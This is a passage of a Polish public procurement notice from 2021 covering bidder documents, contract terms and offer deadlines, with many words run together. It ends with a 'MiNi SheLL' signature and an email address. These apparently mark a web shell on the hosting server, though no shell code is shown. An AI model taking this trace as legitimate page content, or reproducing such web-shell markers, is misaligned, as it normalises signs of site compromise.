w którym wykonawca ma siedzibę lub miejsce<br/>zamieszkania,potwierdzające odpowiednio, żenie otwarto jego likwidacji ani nie ogłoszono upadłości.<br/>Dokument, októrym mowa powyżej, powinienbyć wystawiony nie wcześniej niż 3 miesięcy przed<br/>upływem terminuskładania ofert.2) Jeżeli w kraju,w którym Wykonawca ma siedzibę lub miejsce<br/>zamieszkania, niewydaje się dokumentów, o którychmowa w ust. 1 pkt 2, zastępuje się je w całości lub<br/>częścidokumentem zawierającym odpowiedniooświadczenie Wykonawcy, ze wskazaniem osoby albo<br/>osóbuprawnionych do jego reprezentacji,złożone przed notariuszem lub przed organem<br/>sądowym,administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze<br/>względu na siedzibę lub miejsce zamieszkania Wykonawcy.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Oferta składana jest pod rygorem nieważności w formieelektronicznej lub<br/>wpostaci elektronicznej opatrzonej podpisem zaufanym lub podpisem<br/>osobistym.2.Wykonawcadołącza do oferty oświadczenie o niepodleganiu wykluczeniu oraz<br/>spełnianiu warunkówudziału wpostępowaniu w zakresie wskazanym w SWZ. Oświadczenie to<br/>stanowi dowódpotwierdzającybrak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>postępowaniu, nadzieńskładania ofert, tymczasowo zastępujący wymagane podmiotowe środki<br/>dowodowe,wskazane w rozdziale II podrozdziale 8 pkt 2 SWZ.3. Oświadczenie składane jest<br/>pod rygorem nieważności wformie elektronicznej lub w postaci elektronicznej opatrzonej<br/>podpisem zaufanym,lub podpisemosobistym.WYKONAWCA JEST ZOBOWIĄZANY ZŁOŻYĆ<br/>TAKŻE WRAZ ZOFERTĄ: 1)OŚWIADZCENIE podmiotu udostępniającego zasoby,<br/>potwierdzające brak podstawwykluczenia tegopodmiotu oraz odpowiednio spełnianie warunków<br/>udziału w postępowaniu; (jeżeli dotyczy)2)OŚWIADCZENIE wykonawców wspólnie<br/>ubiegających się o udzieleniezamówienia z którego wynika,które roboty budowlane lub dostawy<br/>lub usługi wykonająposzczególni wykonawcy ( jeżelidotyczy)OŚWIADCZENIE potwierdzające<br/>brak podstawwykluczenia podwykonawcy, na którychzasobach wykonawca nie polega przy<br/>wykazywaniuspełnienia warunków udziału w postępowaniu (jeżeli dotyczy)DO OFERTY<br/>WYKONAWCAZAŁĄCZA RÓWNIEŻ: 1) ZOBOWIĄZANIE podmiotu udostępniającego zasoby (<br/>jeżeli dotyczy)2)dokumenty, z których wynika prawo do podpisania oferty;odpowiednie<br/>pełnomocnictwa (jeżelidotyczy);3) WYKAZ ROZWIĄZAŃ RÓWNOWAŻNYCH wykonawca<br/>załącza do oferty wykaz rozwiązań równoważnych z jego opisem lub normami (jeżeli dotyczy) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia zgodnie z art. 58<br/>ustawyPzp.W przypadku Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówieniapublicznego: •Wykonawcy występujący wspólnie są zobowiązani do<br/>ustanowieniapełnomocnika doreprezentowania ich w postępowaniu albo do reprezentowania ich<br/>w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego.•<br/>Wszelkakorespondencja będzieprowadzona przez zamawiającego wyłącznie z<br/>pełnomocnikiem.• jeżelioferta Wykonawców, októrych mowa w pkt c, zostanie wybrana,<br/>zamawiający zastrzega możliwość żądania przedzawarciem umowy w sprawie zamówienia<br/>publicznego, przedłożeniaumowy regulującejwspółpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wykonawca może zwrócić się pisemnie z uzasadnioną prośbą do Zamawiającego o przedłużenie w/w terminu w przypadkach :<br/>1)	jeżeli wystąpią okoliczności , których nie można było przewidzieć w chwili zawarcia umowy, za którą żadna ze stron nie ponosi odpowiedzialności <br/>(np. klęski żywiołowe, sytuacja ekonomiczna, działanie siły wyższej ) mające bezpośredni wpływ na terminowość wykonywanych robót),<br/>2)	przedłużania się czasu trwania procedur administracyjnych mających wpływ na termin wykonania a nie wynikających z winy Wykonawcy<br/>3)	konieczności wprowadzenia zmian w dokumentacji wywołanych zmianą przepisów prawnych będących podstawa opracowania dokumentacji.<br/>Zmiana terminu wykonania przedmiotu umowy nastąpi w formie Aneksu podpisanego ( zawartego ) przez strony umowy.<br/>1.	Wszelkie zmiany niniejszej umowy mogą być dokonywane wyłącznie w formie aneksu podpisanego przez strony umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-17 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zp.powiat.przemysl.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-17 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-08-09 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com